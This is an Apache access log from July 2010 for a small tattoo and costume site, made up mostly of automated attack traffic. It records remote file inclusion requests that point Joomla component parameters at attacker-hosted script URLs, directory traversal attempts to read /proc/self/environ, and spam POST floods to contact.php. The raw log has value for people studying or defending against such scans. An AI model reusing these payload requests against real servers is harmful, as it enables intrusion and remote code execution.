113.30.66.24 - - [05/Jul/2010:02:00:55 -0500] "GET /db.php?path_local=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 290 "-""Mozilla/5.0"
113.30.66.24 - - [05/Jul/2010:02:00:55 -0500] "GET /logs/access_log.1275782400%20%20/db.php?path_local=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 319 "-""Mozilla/5.0"
113.30.66.24 - - [05/Jul/2010:02:00:55 -0500] "GET /logs/db.php?path_local=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 295 "-""Mozilla/5.0"
112.142.63.237 - - [05/Jul/2010:02:01:33 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 304 - "http://www.google.co.th/imglanding?q=vintage%20tattoo&imgurl=http://www.tattoo-flash-art.com/tattoo-flash-example.jpg&imgrefurl=http://tontongullu.seesaa.net/article/141885886.html&usg=__-vtM_ZphbqX6grmEYYtClUYF1mg=&h=1620&w=2400&sz=741&hl=th&itbs=1&tbnid=Cuwfl9qNdSu73M:&tbnh=101&tbnw=150&prev=/images%3Fq%3Dvintage%2Btattoo%26hl%3Dth%26tbs%3Disch:1&tbs=isch:1&start=0""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1)"
92.60.176.46 - - [05/Jul/2010:02:02:59 -0500] "GET /logs//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12140 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:03:10 -0500] "GET //?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:03:59 -0500] "GET /logs/access_log.1275782400//?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 312 "-""MaMa CaSpEr"
119.235.18.12 - - [05/Jul/2010:02:04:23 -0500] "GET /logs/access_log.1271808000/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
119.235.18.12 - - [05/Jul/2010:02:04:23 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
119.235.18.12 - - [05/Jul/2010:02:04:23 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
92.60.176.46 - - [05/Jul/2010:02:06:10 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:06:11 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:06:12 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:06:31 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:06:31 -0500] "GET /logs/access_log.1275091200/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:06:31 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:06:33 -0500] "GET /logs/access_log.1275609600/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:07:26 -0500] "GET /logs/access_log.1275609600%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
91.199.120.6 - - [05/Jul/2010:02:08:35 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.229.22.22 - - [05/Jul/2010:02:08:48 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:08:48 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:08:49 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
66.99.17.62 - - [05/Jul/2010:02:08:59 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.229.22.22 - - [05/Jul/2010:02:10:02 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:10:22 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:10:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:26 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:26 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:26 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:28 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:28 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:28 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:29 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:29 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:29 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:29 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:30 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:30 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:30 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Dex Bot Search"
87.229.22.22 - - [05/Jul/2010:02:10:37 -0500] "GET /logs/access_log.1275609600//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:10:38 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:10:38 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:10:41 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
209.61.244.6 - - [05/Jul/2010:02:10:47 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:02:10:48 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:02:10:48 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
87.229.22.22 - - [05/Jul/2010:02:10:59 -0500] "GET /logs/access_log.1276128000//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
209.61.244.6 - - [05/Jul/2010:02:11:03 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:02:11:05 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:02:11:08 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
87.229.22.22 - - [05/Jul/2010:02:11:18 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:11:19 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:11:19 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
174.121.93.221 - - [05/Jul/2010:02:12:00 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
174.121.93.221 - - [05/Jul/2010:02:12:02 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.810"
87.229.22.22 - - [05/Jul/2010:02:12:26 -0500] "GET /logs/access_log.1277164800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:12:27 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:12:27 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:13:00 -0500] "GET /logs/access_log.1275782400//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:14:01 -0500] "GET /logs/access_log.1276041600//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
91.199.120.6 - - [05/Jul/2010:02:15:09 -0500] "GET /logs/access_log.1276300800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
91.199.120.6 - - [05/Jul/2010:02:15:09 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
91.199.120.6 - - [05/Jul/2010:02:15:09 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
91.199.120.6 - - [05/Jul/2010:02:15:24 -0500] "GET /logs/access_log.1276732800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
66.99.17.62 - - [05/Jul/2010:02:18:05 -0500] "GET /logs/access_log.1276300800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
66.99.17.62 - - [05/Jul/2010:02:18:05 -0500] "GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
66.99.17.62 - - [05/Jul/2010:02:18:05 -0500] "GET /logs/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
66.99.17.62 - - [05/Jul/2010:02:18:14 -0500] "GET /logs/access_log.1276732800/index.php?option=com_jfeedback&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.229.22.22 - - [05/Jul/2010:02:19:05 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:19:19 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
74.222.0.45 - - [05/Jul/2010:02:19:44 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
193.6.244.125 - - [05/Jul/2010:02:19:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:48 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:48 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:48 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:49 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
74.222.0.45 - - [05/Jul/2010:02:19:49 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://maniacos.net/htaccess?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
193.6.244.125 - - [05/Jul/2010:02:19:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:49 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:49 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:49 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:49 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:50 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:50 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:19:50 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
87.229.22.22 - - [05/Jul/2010:02:19:50 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:19:51 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:19:51 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:19:52 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:19:53 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:19:53 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:19:53 -0500] "GET /logs/access_log.1277424000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:19:59 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
207.191.228.114 - - [05/Jul/2010:02:20:32 -0500] "POST /logs/access_log.1268352000%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:02:20:32 -0500] "POST /logs/access_log.1268352000%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:02:20:32 -0500] "POST /logs/access_log.1268352000%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
207.191.228.114 - - [05/Jul/2010:02:20:32 -0500] "POST /logs/access_log.1268352000%20%20//contact.php HTTP/1.1" 404 325 "-""plaNETWORK Bot Search"
87.229.22.22 - - [05/Jul/2010:02:20:56 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:21:07 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
87.229.22.22 - - [05/Jul/2010:02:21:16 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
194.109.22.66 - - [05/Jul/2010:02:21:17 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:21:17 -0500] "GET /logs/access_log.1275264000/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:21:17 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:21:18 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:21:30 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
67.213.231.211 - - [05/Jul/2010:02:21:42 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:42 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:42 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:42 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:42 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:42 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
67.213.231.211 - - [05/Jul/2010:02:21:43 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
209.61.244.6 - - [05/Jul/2010:02:21:54 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:02:21:55 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:02:21:56 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:02:21:56 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
194.109.22.66 - - [05/Jul/2010:02:21:58 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:21:58 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:21:59 -0500] "GET /logs/access_log.1275782400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:21:59 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:22:00 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:22:00 -0500] "GET /logs/access_log.1276214400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
209.61.244.6 - - [05/Jul/2010:02:22:01 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:02:22:01 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.76"
207.46.195.236 - - [05/Jul/2010:02:22:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.235.18.12 - - [05/Jul/2010:02:22:16 -0500] "GET /administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
119.235.18.12 - - [05/Jul/2010:02:22:19 -0500] "GET /logs/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
119.235.18.12 - - [05/Jul/2010:02:22:19 -0500] "GET /logs/access_log.1271808000/administrator/components/com_gmajax/admin.gmajax.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
194.109.22.66 - - [05/Jul/2010:02:22:24 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
67.195.112.180 - - [05/Jul/2010:02:22:42 -0500] "GET /costume/thmb5.htm HTTP/1.0" 200 3414 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
